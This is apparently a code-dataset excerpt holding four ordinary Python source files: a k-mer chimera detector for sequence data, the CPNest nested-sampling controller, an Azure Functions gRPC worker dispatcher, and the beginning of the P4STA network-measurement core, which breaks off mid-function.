source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
chimera_kmer_multiprocess.py | import multiprocessing
import os
from threading import Semaphore
import sys
import sourmash
import configparser
import screed
import re
import itertools
import copy
rx_size = re.compile(r'size=(\d+)')
abskews = 2
k_size = 17
min_unmatched_k_mer = 30
total_account_for = 0.95
min_percentage = 0.001
kmer_dynamic = True
show_detail = False
padded = True
config_file = os.path.join(os.path.dirname(os.path.abspath(sys.argv[0])), 'chimera_kmer_multiprocess.config')
if os.path.exists(config_file):
config = configparser.ConfigParser()
config.read(config_file)
abskews = float(config['DEFAULT']['abskews'])
k_size = int(config['DEFAULT']['k_size'])
total_account_for = float(config['DEFAULT']['total_account_for'])
min_percentage = float(config['DEFAULT']['min_percentage'])
kmer_dynamic = config['DEFAULT']['kmer_dynamic']
if kmer_dynamic not in ["True", "true"]:
kmer_dynamic = False
else:
kmer_dynamic = True
show_detail = config['DEFAULT']['show_detail']
if show_detail not in ["True", "true"]:
show_detail = False
else:
show_detail = True
padded = config['DEFAULT']['padded']
if padded not in ["True", "true"]:
padded = False
else:
padded = True
def duo (e1, e2):
e2_in_e1 = e2.intersection(e1)
what_left = e2.difference(e1)
return ([e2_in_e1, what_left])
in_queue = multiprocessing.Manager().Queue()
out_queue = multiprocessing.Manager().Queue()
detail_queue = multiprocessing.Manager().Queue()
writeLock = Semaphore(value = 1)
#filename = "/home/sih13/Downloads/cyano8_nonchimera.fasta"
filename = sys.argv[1]
#print (filename)
seqs = {}
names = []
sizes = []
with screed.open(filename) as seqfile:
for read in seqfile:
#print(read.name, read.sequence)
search_size = rx_size.search(read.name)
if search_size:
how_many_kmer = 1000
padded_sequence = read.sequence
if padded == True:
padded_sequence = "A" * k_size + read.sequence + "T" * k_size
if kmer_dynamic == True:
how_many_kmer = len(padded_sequence) - k_size + 1
E2 = sourmash.MinHash(n=how_many_kmer, ksize=k_size)
E2.add_sequence(padded_sequence)
e2 = set(E2.get_hashes())
seqs[read.name] = {"size": int(search_size.group(1)), "md5s": e2}
names.append(read.name)
sizes.append(int(search_size.group(1)))
sorted_name = [x for _,x in sorted(zip(sizes,names))]
sorted_size = [x for x,_ in sorted(zip(sizes,names))]
#print (sorted_size[:10])
def work():
while True:
i = in_queue.get()
current_investigate_name = sorted_name[i]
current_investigate_size = sorted_size[i]
#print (i)
current_list = copy.deepcopy(sorted_name)
e2 = seqs[current_investigate_name]["md5s"]
#print ("current_investigate_name:", current_investigate_name)
del (current_list[i])
hit_list = []
coverages = []
#print (current_list)
while len(current_list) > 0 and len(e2) > k_size:
max_percentage = 0
max_percentage_name = ""
what_left = set()
#print (current_list)
for j in range(i + 1, len(current_list)):
if seqs[current_list[j]]["size"] / current_investigate_size > abskews:
# E1 = sourmash.MinHash(n=(len(seqs[current_list[j]]["seq"]) - k_size + 1), ksize=k_size)
# E1.add_sequence(seqs[current_list[j]]["seq"])
#e1 = set(E1.get_hashes())
e1 = seqs[current_list[j]]["md5s"]
duo_result = duo(e1, e2)
overlap = len(duo_result[0]) / len(seqs[current_investigate_name]["md5s"])
if overlap > max_percentage and overlap >= min_percentage:
max_percentage = overlap
max_percentage_name = current_list[j]
what_left = duo_result[1]
if max_percentage_name != "":
current_list.remove(max_percentage_name)
e2 = what_left
hit_list.append(max_percentage_name)
coverages.append(max_percentage)
else:
break
if show_detail == True:
detail_queue.put([current_investigate_name, hit_list, coverages])
#print (sum(coverages))
if len(coverages) >= 2 and sum(coverages) >= total_account_for and len(e2) <= min_unmatched_k_mer:
out_queue.put(current_investigate_name)
#print (to_delete_name)
#writeLock.release()
in_queue.task_done()
for i in range(5):
t = multiprocessing.Process(target=work)
t.daemon = True
t.start()
for i in range(len(sorted_name)):
#print (sorted_name[i])
in_queue.put(i)
in_queue.join()
n = 0
if show_detail == True:
while not detail_queue.empty():
detail = detail_queue.get()
print (f"Query: {detail[0]}:\n")
for name, percentage in zip(detail[1], detail[2]):
print (f"{name}: {percentage}")
print ("\n\n")
detail_queue.task_done()
detail_queue.join()
while not out_queue.empty():
result = out_queue.get()
print (result)
n += 1
out_queue.task_done()
#print ("\n\n")
#out_queue.join()
print (f"There are {n} potential chimeras.")
#print (kmer_dynamic)
|
cpnest.py | #! /usr/bin/env python
# coding: utf-8
import multiprocessing as mp
from ctypes import c_double, c_int
import numpy as np
import os
import sys
import signal
from multiprocessing.sharedctypes import Value, Array
from multiprocessing import Lock
from multiprocessing.managers import SyncManager
import cProfile
class CheckPoint(Exception):
print("Checkpoint exception raise")
pass
def sighandler(signal, frame):
print("Handling signal {}".format(signal))
raise CheckPoint()
class CPNest(object):
"""
Class to control CPNest sampler
cp = CPNest(usermodel,nlive=100,output='./',verbose=0,seed=None,maxmcmc=100,nthreads=None,balanced_sampling = True)
Input variables:
usermodel : an object inheriting cpnest.model.Model that defines the user's problem
nlive : Number of live points (100)
poolsize: Number of objects in the sampler pool (100)
output : output directory (./)
verbose: Verbosity, 0=silent, 1=progress, 2=diagnostic, 3=detailed diagnostic
seed: random seed (default: 1234)
maxmcmc: maximum MCMC points for sampling chains (100)
nthreads: number of parallel samplers. Default (None) uses mp.cpu_count() to autodetermine
nhamiltomnian: number of sampler threads using an hamiltonian samplers. Default: 0
resume: determines whether cpnest will resume a run or run from scratch. Default: False.
proposal: dictionary/list with custom jump proposals. key 'mhs' for the
Metropolis-Hastings sampler, 'hmc' for the Hamiltonian Monte-Carlo sampler. Default: None
n_periodic_checkpoint: int
checkpoint the sampler every n_periodic_checkpoint iterations
Default: None (disabled)
"""
def __init__(self,
usermodel,
nlive = 100,
poolsize = 100,
output = './',
verbose = 0,
seed = None,
maxmcmc = 100,
nthreads = None,
nhamiltonian = 0,
resume = False,
proposals = None,
n_periodic_checkpoint = None):
if nthreads is None:
self.nthreads = mp.cpu_count()
else:
self.nthreads = nthreads
print('Running with {0} parallel threads'.format(self.nthreads))
from .sampler import HamiltonianMonteCarloSampler, MetropolisHastingsSampler
from .NestedSampling import NestedSampler
from .proposal import DefaultProposalCycle, HamiltonianProposalCycle
if proposals is None:
proposals = dict(mhs=DefaultProposalCycle,
hmc=HamiltonianProposalCycle)
elif type(proposals) == list:
proposals = dict(mhs=proposals[0],
hmc=proposals[1])
self.nlive = nlive
self.verbose = verbose
self.output = output
self.poolsize = poolsize
self.posterior_samples = None
self.manager = RunManager(nthreads=self.nthreads)
self.manager.start()
self.user = usermodel
self.resume = resume
if seed is None: self.seed=1234
else:
self.seed=seed
self.process_pool = []
# instantiate the nested sampler class
resume_file = os.path.join(output, "nested_sampler_resume.pkl")
if not os.path.exists(resume_file) or resume == False:
self.NS = NestedSampler(self.user,
nlive = nlive,
output = output,
verbose = verbose,
seed = self.seed,
prior_sampling = False,
manager = self.manager,
n_periodic_checkpoint = n_periodic_checkpoint)
else:
self.NS = NestedSampler.resume(resume_file, self.manager, self.user)
# instantiate the sampler class
for i in range(self.nthreads-nhamiltonian):
resume_file = os.path.join(output, "sampler_{0:d}.pkl".format(i))
if not os.path.exists(resume_file) or resume == False:
sampler = MetropolisHastingsSampler(self.user,
maxmcmc,
verbose = verbose,
output = output,
poolsize = poolsize,
seed = self.seed+i,
proposal = proposals['mhs'](),
resume_file = resume_file,
manager = self.manager
)
else:
sampler = MetropolisHastingsSampler.resume(resume_file,
self.manager,
self.user)
p = mp.Process(target=sampler.produce_sample)
self.process_pool.append(p)
for i in range(self.nthreads-nhamiltonian,self.nthreads):
resume_file = os.path.join(output, "sampler_{0:d}.pkl".format(i))
if not os.path.exists(resume_file) or resume == False:
sampler = HamiltonianMonteCarloSampler(self.user,
maxmcmc,
verbose = verbose,
output = output,
poolsize = poolsize,
seed = self.seed+i,
proposal = proposals['hmc'](model=self.user),
resume_file = resume_file,
manager = self.manager
)
else:
sampler = HamiltonianMonteCarloSampler.resume(resume_file,
self.manager,
self.user)
p = mp.Process(target=sampler.produce_sample)
self.process_pool.append(p)
def run(self):
"""
Run the sampler
"""
if self.resume:
signal.signal(signal.SIGTERM, sighandler)
signal.signal(signal.SIGALRM, sighandler)
signal.signal(signal.SIGQUIT, sighandler)
signal.signal(signal.SIGINT, sighandler)
signal.signal(signal.SIGUSR1, sighandler)
signal.signal(signal.SIGUSR2, sighandler)
#self.p_ns.start()
for each in self.process_pool:
each.start()
try:
self.NS.nested_sampling_loop()
for each in self.process_pool:
each.join()
except CheckPoint:
self.checkpoint()
sys.exit(130)
self.posterior_samples = self.get_posterior_samples(filename=None)
if self.verbose>1: self.plot()
#TODO: Clean up the resume pickles
def get_nested_samples(self, filename='nested_samples.dat'):
"""
returns nested sampling chain
Parameters
----------
filename : string
If given, file to save nested samples to
Returns
-------
pos : :obj:`numpy.ndarray`
"""
import numpy.lib.recfunctions as rfn
self.nested_samples = rfn.stack_arrays(
[s.asnparray()
for s in self.NS.nested_samples]
,usemask=False)
if filename:
np.savetxt(os.path.join(
self.NS.output_folder,'nested_samples.dat'),
self.nested_samples.ravel(),
header=' '.join(self.nested_samples.dtype.names),
newline='\n',delimiter=' ')
return self.nested_samples
def get_posterior_samples(self, filename='posterior.dat'):
"""
Returns posterior samples
Parameters
----------
filename : string
If given, file to save posterior samples to
Returns
-------
pos : :obj:`numpy.ndarray`
"""
import numpy as np
import os
from .nest2pos import draw_posterior_many
nested_samples = self.get_nested_samples()
posterior_samples = draw_posterior_many([nested_samples],[self.nlive],verbose=self.verbose)
posterior_samples = np.array(posterior_samples)
# TODO: Replace with something to output samples in whatever format
if filename:
np.savetxt(os.path.join(
self.NS.output_folder,'posterior.dat'),
self.posterior_samples.ravel(),
header=' '.join(posterior_samples.dtype.names),
newline='\n',delimiter=' ')
return posterior_samples
def plot(self, corner = True):
"""
Make diagnostic plots of the posterior and nested samples
"""
pos = self.posterior_samples
from . import plot
for n in pos.dtype.names:
plot.plot_hist(pos[n].ravel(),name=n,filename=os.path.join(self.output,'posterior_{0}.png'.format(n)))
for n in self.nested_samples.dtype.names:
plot.plot_chain(self.nested_samples[n],name=n,filename=os.path.join(self.output,'nschain_{0}.png'.format(n)))
import numpy as np
plotting_posteriors = np.squeeze(pos.view((pos.dtype[0], len(pos.dtype.names))))
if corner: plot.plot_corner(plotting_posteriors,labels=pos.dtype.names,filename=os.path.join(self.output,'corner.png'))
def worker_sampler(self, producer_pipe, logLmin):
cProfile.runctx('self.sampler.produce_sample(producer_pipe, logLmin)', globals(), locals(), 'prof_sampler.prof')
def worker_ns(self):
cProfile.runctx('self.NS.nested_sampling_loop(self.consumer_pipes)', globals(), locals(), 'prof_nested_sampling.prof')
def profile(self):
for i in range(0,self.NUMBER_OF_PRODUCER_PROCESSES):
p = mp.Process(target=self.worker_sampler, args=(self.queues[i%len(self.queues)], self.NS.logLmin ))
self.process_pool.append(p)
for i in range(0,self.NUMBER_OF_CONSUMER_PROCESSES):
p = mp.Process(target=self.worker_ns, args=(self.queues, self.port, self.authkey))
self.process_pool.append(p)
for each in self.process_pool:
each.start()
def checkpoint(self):
self.manager.checkpoint_flag=1
class RunManager(SyncManager):
def __init__(self, nthreads=None, **kwargs):
super(RunManager,self).__init__(**kwargs)
self.nconnected=mp.Value(c_int,0)
self.producer_pipes = list()
self.consumer_pipes = list()
for i in range(nthreads):
consumer, producer = mp.Pipe(duplex=True)
self.producer_pipes.append(producer)
self.consumer_pipes.append(consumer)
self.logLmin=None
self.nthreads=nthreads
def start(self):
super(RunManager, self).start()
self.logLmin = mp.Value(c_double,-np.inf)
self.checkpoint_flag=mp.Value(c_int,0)
def connect_producer(self):
"""
Returns the producer's end of the pipe
"""
with self.nconnected.get_lock():
n = self.nconnected.value
pipe = self.producer_pipes[n]
self.nconnected.value+=1
return pipe, n
|
dispatcher.py | """GRPC client.
Implements loading and execution of Python workers.
"""
import asyncio
import concurrent.futures
import logging
import queue
import threading
import traceback
import os
import grpc
import pkg_resources
from . import bindings
from . import functions
from . import loader
from . import protos
from . import constants
from .logging import error_logger, logger
class DispatcherMeta(type):
__current_dispatcher__ = None
@property
def current(mcls):
disp = mcls.__current_dispatcher__
if disp is None:
raise RuntimeError('no currently running Dispatcher is found')
return disp
class Dispatcher(metaclass=DispatcherMeta):
_GRPC_STOP_RESPONSE = object()
def __init__(self, loop, host, port, worker_id, request_id,
grpc_connect_timeout, grpc_max_msg_len):
self._loop = loop
self._host = host
self._port = port
self._request_id = request_id
self._worker_id = worker_id
self._functions = functions.Registry()
# A thread-pool for synchronous function calls. We limit
# the number of threads to 1 so that one Python worker can
# only run one synchronous function in parallel. This is
# because synchronous code in Python is rarely designed with
# concurrency in mind, so we don't want to allow users to
# have races in their synchronous functions. Moreover,
# because of the GIL in CPython, it rarely makes sense to
# use threads (unless the code is IO bound, but we have
# async support for that.)
self._sync_call_tp = concurrent.futures.ThreadPoolExecutor(
max_workers=1)
self._grpc_connect_timeout = grpc_connect_timeout
self._grpc_max_msg_len = grpc_max_msg_len
self._grpc_resp_queue: queue.Queue = queue.Queue()
self._grpc_connected_fut = loop.create_future()
self._grpc_thread = threading.Thread(
name='grpc-thread', target=self.__poll_grpc)
def load_bindings(self):
"""Load out-of-tree binding implementations."""
services = {}
for ep in pkg_resources.iter_entry_points('azure.functions.bindings'):
logger.info('Loading binding plugin from %s', ep.module_name)
ep.load()
return services
@classmethod
async def connect(cls, host, port, worker_id, request_id,
connect_timeout, max_msg_len=None):
loop = asyncio._get_running_loop()
disp = cls(loop, host, port, worker_id, request_id,
connect_timeout, max_msg_len)
disp._grpc_thread.start()
await disp._grpc_connected_fut
logger.info('Successfully opened gRPC channel to %s:%s', host, port)
return disp
async def dispatch_forever(self):
if DispatcherMeta.__current_dispatcher__ is not None:
raise RuntimeError(
'there can be only one running dispatcher per process')
self._old_task_factory = self._loop.get_task_factory()
loader.install()
DispatcherMeta.__current_dispatcher__ = self
try:
forever = self._loop.create_future()
self._grpc_resp_queue.put_nowait(
protos.StreamingMessage(
request_id=self.request_id,
start_stream=protos.StartStream(
worker_id=self.worker_id)))
self._loop.set_task_factory(
lambda loop, coro: ContextEnabledTask(coro, loop=loop))
logging_handler = AsyncLoggingHandler()
root_logger = logging.getLogger()
root_logger.setLevel(logging.INFO)
root_logger.addHandler(logging_handler)
try:
await forever
finally:
root_logger.removeHandler(logging_handler)
finally:
DispatcherMeta.__current_dispatcher__ = None
loader.uninstall()
self._loop.set_task_factory(self._old_task_factory)
self.stop()
def stop(self):
if self._grpc_thread is not None:
self._grpc_resp_queue.put_nowait(self._GRPC_STOP_RESPONSE)
self._grpc_thread.join()
self._grpc_thread = None
if self._sync_call_tp is not None:
self._sync_call_tp.shutdown()
self._sync_call_tp = None
def _on_logging(self, record: logging.LogRecord, formatted_msg: str):
if record.levelno >= logging.CRITICAL:
log_level = protos.RpcLog.Critical
elif record.levelno >= logging.ERROR:
log_level = protos.RpcLog.Error
elif record.levelno >= logging.WARNING:
log_level = protos.RpcLog.Warning
elif record.levelno >= logging.INFO:
log_level = protos.RpcLog.Information
elif record.levelno >= logging.DEBUG:
log_level = protos.RpcLog.Debug
else:
log_level = getattr(protos.RpcLog, 'None')
log = dict(
level=log_level,
message=formatted_msg,
category=record.name,
)
invocation_id = get_current_invocation_id()
if invocation_id is not None:
log['invocation_id'] = invocation_id
# XXX: When an exception field is set in RpcLog, WebHost doesn't
# wait for the call result and simply aborts the execution.
#
# if record.exc_info and record.exc_info[1] is not None:
# log['exception'] = self._serialize_exception(record.exc_info[1])
self._grpc_resp_queue.put_nowait(
protos.StreamingMessage(
request_id=self.request_id,
rpc_log=protos.RpcLog(**log)))
@property
def request_id(self):
return self._request_id
@property
def worker_id(self):
return self._worker_id
def _serialize_exception(self, exc):
try:
message = f'{type(exc).__name__}: {exc}'
except Exception:
message = (f'Unhandled exception in function. '
f'Could not serialize original exception message.')
try:
stack_trace = ''.join(traceback.format_tb(exc.__traceback__))
except Exception:
stack_trace = ''
return protos.RpcException(message=message, stack_trace=stack_trace)
async def _dispatch_grpc_request(self, request):
content_type = request.WhichOneof('content')
request_handler = getattr(self, f'_handle__{content_type}', None)
if request_handler is None:
# Don't crash on unknown messages. Some of them can be ignored;
# and if something goes really wrong the host can always just
# kill the worker's process.
logger.error(
f'unknown StreamingMessage content type {content_type}')
return
resp = await request_handler(request)
self._grpc_resp_queue.put_nowait(resp)
async def _handle__worker_init_request(self, req):
logger.info('Received WorkerInitRequest, request ID %s',
self.request_id)
capabilities = dict()
capabilities[constants.RAW_HTTP_BODY_BYTES] = "true"
return protos.StreamingMessage(
request_id=self.request_id,
worker_init_response=protos.WorkerInitResponse(
capabilities=capabilities,
result=protos.StatusResult(
status=protos.StatusResult.Success)))
async def _handle__function_load_request(self, req):
func_request = req.function_load_request
function_id = func_request.function_id
logger.info('Received FunctionLoadRequest, request ID: %s, '
'function ID: %s', self.request_id, function_id)
try:
func = loader.load_function(
func_request.metadata.name,
func_request.metadata.directory,
func_request.metadata.script_file,
func_request.metadata.entry_point)
self._functions.add_function(
function_id, func, func_request.metadata)
logger.info('Successfully processed FunctionLoadRequest, '
'request ID: %s, function ID: %s',
self.request_id, function_id)
return protos.StreamingMessage(
request_id=self.request_id,
function_load_response=protos.FunctionLoadResponse(
function_id=function_id,
result=protos.StatusResult(
status=protos.StatusResult.Success)))
except Exception as ex:
return protos.StreamingMessage(
request_id=self.request_id,
function_load_response=protos.FunctionLoadResponse(
function_id=function_id,
result=protos.StatusResult(
status=protos.StatusResult.Failure,
exception=self._serialize_exception(ex))))
async def _handle__invocation_request(self, req):
invoc_request = req.invocation_request
invocation_id = invoc_request.invocation_id
function_id = invoc_request.function_id
# Set the current `invocation_id` to the current task so
# that our logging handler can find it.
current_task = asyncio.Task.current_task(self._loop)
assert isinstance(current_task, ContextEnabledTask)
current_task.set_azure_invocation_id(invocation_id)
logger.info('Received FunctionInvocationRequest, request ID: %s, '
'function ID: %s, invocation ID: %s',
self.request_id, function_id, invocation_id)
try:
fi: functions.FunctionInfo = self._functions.get_function(
function_id)
args = {}
for pb in invoc_request.input_data:
pb_type_info = fi.input_types[pb.name]
if bindings.is_trigger_binding(pb_type_info.binding_name):
trigger_metadata = invoc_request.trigger_metadata
else:
trigger_metadata = None
args[pb.name] = bindings.from_incoming_proto(
pb_type_info.binding_name, pb.data,
trigger_metadata=trigger_metadata,
pytype=pb_type_info.pytype)
if fi.requires_context:
args['context'] = bindings.Context(
fi.name, fi.directory, invocation_id)
if fi.output_types:
for name in fi.output_types:
args[name] = bindings.Out()
if fi.is_async:
call_result = await fi.func(**args)
else:
call_result = await self._loop.run_in_executor(
self._sync_call_tp,
self.__run_sync_func, invocation_id, fi.func, args)
if call_result is not None and not fi.has_return:
raise RuntimeError(
f'function {fi.name!r} without a $return binding '
f'returned a non-None value')
output_data = []
if fi.output_types:
for out_name, out_type_info in fi.output_types.items():
val = args[out_name].get()
if val is None:
# TODO: is the "Out" parameter optional?
# Can "None" be marshaled into protos.TypedData?
continue
rpc_val = bindings.to_outgoing_proto(
out_type_info.binding_name, val,
pytype=out_type_info.pytype)
assert rpc_val is not None
output_data.append(
protos.ParameterBinding(
name=out_name,
data=rpc_val))
return_value = None
if fi.return_type is not None:
return_value = bindings.to_outgoing_proto(
fi.return_type.binding_name, call_result,
pytype=fi.return_type.pytype)
logger.info('Successfully processed FunctionInvocationRequest, '
'request ID: %s, function ID: %s, invocation ID: %s',
self.request_id, function_id, invocation_id)
return protos.StreamingMessage(
request_id=self.request_id,
invocation_response=protos.InvocationResponse(
invocation_id=invocation_id,
return_value=return_value,
result=protos.StatusResult(
status=protos.StatusResult.Success),
output_data=output_data))
except Exception as ex:
return protos.StreamingMessage(
request_id=self.request_id,
invocation_response=protos.InvocationResponse(
invocation_id=invocation_id,
result=protos.StatusResult(
status=protos.StatusResult.Failure,
exception=self._serialize_exception(ex))))
async def _handle__function_environment_reload_request(self, req):
try:
logger.info('Received FunctionEnvironmentReloadRequest, '
'request ID: %s', self.request_id)
func_env_reload_request = req.function_environment_reload_request
os.environ.clear()
env_vars = func_env_reload_request.environment_variables
for var in env_vars:
os.environ[var] = env_vars[var]
success_response = protos.FunctionEnvironmentReloadResponse(
result=protos.StatusResult(
status=protos.StatusResult.Success))
return protos.StreamingMessage(
request_id=self.request_id,
function_environment_reload_response=success_response)
except Exception as ex:
failure_response = protos.FunctionEnvironmentReloadResponse(
result=protos.StatusResult(
status=protos.StatusResult.Failure,
exception=self._serialize_exception(ex)))
return protos.StreamingMessage(
request_id=self.request_id,
function_environment_reload_response=failure_response)
def __run_sync_func(self, invocation_id, func, params):
# This helper exists because we need to access the current
# invocation_id from ThreadPoolExecutor's threads.
_invocation_id_local.v = invocation_id
try:
return func(**params)
finally:
_invocation_id_local.v = None
def __poll_grpc(self):
options = []
if self._grpc_max_msg_len:
options.append(('grpc.max_receive_message_length',
self._grpc_max_msg_len))
options.append(('grpc.max_send_message_length',
self._grpc_max_msg_len))
channel = grpc.insecure_channel(
f'{self._host}:{self._port}', options)
try:
grpc.channel_ready_future(channel).result(
timeout=self._grpc_connect_timeout)
except Exception as ex:
self._loop.call_soon_threadsafe(
self._grpc_connected_fut.set_exception, ex)
return
else:
self._loop.call_soon_threadsafe(
self._grpc_connected_fut.set_result, True)
stub = protos.FunctionRpcStub(channel)
def gen(resp_queue):
while True:
msg = resp_queue.get()
if msg is self._GRPC_STOP_RESPONSE:
grpc_req_stream.cancel()
return
yield msg
grpc_req_stream = stub.EventStream(gen(self._grpc_resp_queue))
try:
for req in grpc_req_stream:
self._loop.call_soon_threadsafe(
self._loop.create_task, self._dispatch_grpc_request(req))
except Exception as ex:
if ex is grpc_req_stream:
# Yes, this is how grpc_req_stream iterator exits.
return
error_logger.exception('unhandled error in gRPC thread')
raise
class AsyncLoggingHandler(logging.Handler):
def emit(self, record):
if not record.name.startswith('azure.functions_worker'):
# Skip worker system logs
msg = self.format(record)
Dispatcher.current._on_logging(record, msg)
class ContextEnabledTask(asyncio.Task):
_AZURE_INVOCATION_ID = '__azure_function_invocation_id__'
def __init__(self, coro, loop):
super().__init__(coro, loop=loop)
current_task = asyncio.Task.current_task(loop)
if current_task is not None:
invocation_id = getattr(
current_task, self._AZURE_INVOCATION_ID, None)
if invocation_id is not None:
self.set_azure_invocation_id(invocation_id)
def set_azure_invocation_id(self, invocation_id):
setattr(self, self._AZURE_INVOCATION_ID, invocation_id)
def get_current_invocation_id():
loop = asyncio._get_running_loop()
if loop is not None:
current_task = asyncio.Task.current_task(loop)
if current_task is not None:
return getattr(
current_task, ContextEnabledTask._AZURE_INVOCATION_ID, None)
return getattr(_invocation_id_local, 'v', None)
_invocation_id_local = threading.local()
|
core.py | # Copyright 2019-present Ralf Kundel, Fridolin Siegmund
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import importlib
import json
import os
import rpyc
import shutil
import subprocess
import sys
import time
import threading
import traceback
from pathlib import Path
from tabulate import tabulate
import P4STA_utils
dir_path = os.path.dirname(os.path.realpath(__file__))
project_path = dir_path[0:dir_path.find("/core")]
sys.path.append(project_path)
try:
from analytics import analytics
except Exception as e:
# prevent PEP3 warning because sys append must be before
raise e
first_run = False
class P4staCore(rpyc.Service):
all_targets = {}
all_extHosts = {}
all_loadGenerators = {}
measurement_id = -1 # will be set when external host is started
method_return = None
def get_project_path(self):
return project_path
def __init__(self):
global first_run
first_run = False
print("init p4sta core")
P4STA_utils.set_project_path(project_path)
# Find installed Targets
fullpath = os.path.join(project_path, "stamper_targets")
dirs = [d for d in os.listdir(fullpath) if
os.path.isdir(os.path.join(fullpath, d))]
for dir in dirs:
config_path = os.path.join(fullpath, dir, "target_config.json")
if os.path.isfile(config_path):
# we found a target
with open(config_path, "r") as f:
cfg = json.load(f)
cfg["real_path"] = os.path.join(fullpath, dir)
self.all_targets.update({cfg["target"]: cfg})
# Find installed extHosts
fullpath = os.path.join(project_path, "extHost")
dirs = [d for d in os.listdir(fullpath) if
os.path.isdir(os.path.join(fullpath, d))]
for dir in dirs:
config_path = os.path.join(fullpath, dir, "extHost_config.json")
if os.path.isfile(config_path):
# we found a extHost
with open(config_path, "r") as f:
cfg = json.load(f)
cfg["real_path"] = os.path.join(fullpath, dir)
self.all_extHosts.update({cfg["name"]: cfg})
fullpath = os.path.join(project_path, "loadGenerators")
dirs = [d for d in os.listdir(fullpath) if
os.path.isdir(os.path.join(fullpath, d))]
for dir in dirs:
config_path = os.path.join(fullpath, dir,
"loadGenerator_config.json")
if os.path.isfile(config_path):
# we found a load generator
with open(config_path, "r") as f:
cfg = json.load(f)
cfg["real_path"] = os.path.join(fullpath, dir)
self.all_loadGenerators.update({cfg["name"]: cfg})
print(self.all_loadGenerators)
self.check_first_run()
def check_first_run(self):
global first_run
if P4STA_utils.read_current_cfg() is None:
print("config.json not found. Creating new one from empty "
"bmv2 template.")
path = self.get_template_cfg_path("bmv2")
if not os.path.exists(os.path.join(project_path, "data")):
# create data directory if not exist
os.makedirs(os.path.join(project_path,
"data"))
with open(path, "r") as f:
cfg = json.load(f)
P4STA_utils.write_config(cfg)
first_run = True
return first_run
def first_run_finished(self):
global first_run
first_run = False
def write_install_script(self, first_time_cfg):
install_script = []
if "stamper_user" in first_time_cfg:
stamper_name = first_time_cfg["selected_stamper"]
stamper_target = self.get_stamper_target_obj(stamper_name)
if "target_specific_dict" in first_time_cfg:
target_specific_dict = first_time_cfg["target_specific_dict"]
else:
target_specific_dict = {}
install_script.extend(stamper_target.get_server_install_script(
user_name=first_time_cfg["stamper_user"],
ip=first_time_cfg["stamper_ssh_ip"],
target_specific_dict=target_specific_dict))
install_script.append("")
if "ext_host_user" in first_time_cfg:
ext_host_name = first_time_cfg["selected_extHost"]
ext_host = self.get_extHost_obj(ext_host_name)
install_script.extend(ext_host.get_server_install_script(
user_name=first_time_cfg["ext_host_user"],
ip=first_time_cfg["ext_host_ssh_ip"]))
install_script.append("")
loadgen = self.get_loadgen_obj(first_time_cfg["selected_loadgen"])
install_script.extend(
loadgen.get_server_install_script(first_time_cfg["loadgens"]))
with open("install_server.sh", "w") as f:
for line in install_script:
f.write(line + "\n")
f.close()
os.chmod("install_server.sh", 0o775)
# returns an instance of current selected target config object
def get_stamper_target_obj(self, target_name):
target_description = self.all_targets[target_name]
path_to_driver = (os.path.join(target_description["real_path"],
target_description["target_driver"]))
spec = importlib.util.spec_from_file_location("TargetImpl",
path_to_driver)
foo = importlib.util.module_from_spec(spec)
spec.loader.exec_module(foo)
get_stamper_target_obj = foo.TargetImpl(
target_description)
get_stamper_target_obj.setRealPath(target_description["real_path"])
return get_stamper_target_obj
def get_extHost_obj(self, name):
host_description = self.all_extHosts[name]
path_to_driver = (os.path.join(host_description["real_path"],
host_description["driver"]))
spec = importlib.util.spec_from_file_location("ExtHostImpl",
path_to_driver)
foo = importlib.util.module_from_spec(spec)
spec.loader.exec_module(foo)
get_stamper_target_obj = foo.ExtHostImpl(
host_description)
get_stamper_target_obj.setRealPath(host_description["real_path"])
return get_stamper_target_obj
def get_current_extHost_obj(self):
return self.get_extHost_obj(
P4STA_utils.read_current_cfg()["selected_extHost"])
# returns an instance of current selected load generator object
def get_loadgen_obj(self, name):
loadgen_description = self.all_loadGenerators[name]
path_to_driver = (os.path.join(loadgen_description["real_path"],
loadgen_description["driver"]))
spec = importlib.util.spec_from_file_location("LoadGeneratorImpl",
path_to_driver)
foo = importlib.util.module_from_spec(spec)
spec.loader.exec_module(foo)
ext_host_target_obj = foo.LoadGeneratorImpl(
loadgen_description)
ext_host_target_obj.setRealPath(loadgen_description["real_path"])
return ext_host_target_obj
def get_all_extHost(self):
lst = []
for extH in self.all_extHosts.keys():
lst.append(extH)
return lst
def get_all_targets(self):
lst = []
for target in self.all_targets.keys():
lst.append(target)
return lst
def get_all_loadGenerators(self):
lst = []
for loadgen in self.all_loadGenerators.keys():
lst.append(loadgen)
return lst
def get_target_cfg(self, target_name=""):
try:
if target_name == "":
target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
else:
target = self.get_stamper_target_obj(target_name)
with open(os.path.join(target.realPath, "target_config.json"),
"r") as f:
return json.load(f)
except Exception:
P4STA_utils.log_error(
"CORE Exception in get_target_cfg: " + traceback.format_exc())
return {}
def get_available_cfg_files(self):
lst = []
folder_path = os.path.join(project_path, "data")
all_files = [f for f in os.listdir(folder_path) if
os.path.isfile(os.path.join(folder_path, f))]
for f in all_files:
if f == "config.json":
continue
if f.endswith(".json"):
lst.append(f)
try:
date_time_objects = []
all_targets = self.get_all_targets()
for filename in lst:
# only match json files with valid names like bmv2_
match = False
for target in all_targets:
if filename.startswith(target):
match = True
break
if match:
# e.g. tofino_model_01.08.2020-16:19:06.json
datestr = filename.split("_")[-1].split(".json")[0]
date_time_objects.append([filename,
datetime.datetime.strptime(
datestr,
'%d.%m.%Y-%H:%M:%S')])
# now sort list of date_list by date (index 1)
date_time_objects.sort(key=lambda x: x[1], reverse=True)
final = []
for time_list in date_time_objects:
final.append(time_list[0])
return final
except Exception:
print("EXCEPTION get_available_cfg_files")
print(traceback.format_exc())
return lst
def read_result_cfg(self, run_id):
path = os.path.join(project_path, "results", str(run_id),
"config_" + str(run_id) + ".json")
return self.open_cfg_file(path)
def get_template_cfg_path(self, stamper_target_name):
target = self.get_stamper_target_obj(stamper_target_name)
path = target.getFullTemplatePath()
return path
def open_cfg_file(self, path):
my_file = Path(path)
if not my_file.is_file():
print("open_cfg_file: " + path + "; not found.")
return None
with open(path, "r") as f:
cfg = json.load(f)
